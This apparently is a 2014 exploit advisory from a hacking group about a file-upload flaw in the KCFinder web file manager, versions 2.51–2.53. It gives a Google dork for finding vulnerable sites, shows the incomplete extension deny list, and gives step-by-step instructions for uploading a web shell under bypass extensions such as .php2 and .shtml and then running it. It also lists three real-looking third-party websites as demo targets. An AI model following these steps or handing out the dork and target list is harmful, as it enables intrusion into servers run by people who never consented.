Exploit Title : KCFinder Upload Shell Vulnerability
Date : 24/04/2014
Google Dork : inurl:/kcfinder/browse.php
Exploit Author : Iranian_Dark_Coders_Team
Home : http://www.idc-team.net
Discovered By : Black.Hack3r
Vendor Homepage : http://kcfinder.sunhater.com/
Version : 2.51 – 2.53
Tested on : Windows 8 & Linux

Events location bug:

http://[localhost]/[path]/kcfinder/config.php

Line 51: ‘deniedExts’ => “exe com msi bat php phps phtml php3 php4 cgi pl”,

Exploit:

http://[localhost]/kcfinder/browse.php
http://[localhost]/[path]/kcfinder/browse.php

Proof:

STEP 1: Go to target link
http://localhost/KCFinder/browse.php

STEP 2: Then select your folder from the left panel

STEP 3: Upload your shell as [ shell.php2 & shell.php5 & shell.php.black & shell.shtml &
defpage.html ]

STEP 4: Shell execution path

http://[localhost]/[path]/files/shell.php2
OR
http://[localhost]/[path]/files/files/shell.php2

Demo site:

http://www.basuXkiwater.com/assets/js/mylibs/kcfinder/browse.php
http://www.padeXl4u2.be/kcfinder/browse.php
http://goyathlayXsvintagepavonirestorations.com/kcfinder/browse.php

Discovered By : Black.Hack3r
We Are : M.R.S.CO,Black.Hack3r,N3O,[email protected][email protected],KurD_HaCK3R,HOt0N
SpTnx : Sec4ever,HashoR,@3is,Security,M4H4N,Mr.Cicili And All IDC Member
Home : http://www.idc-team.net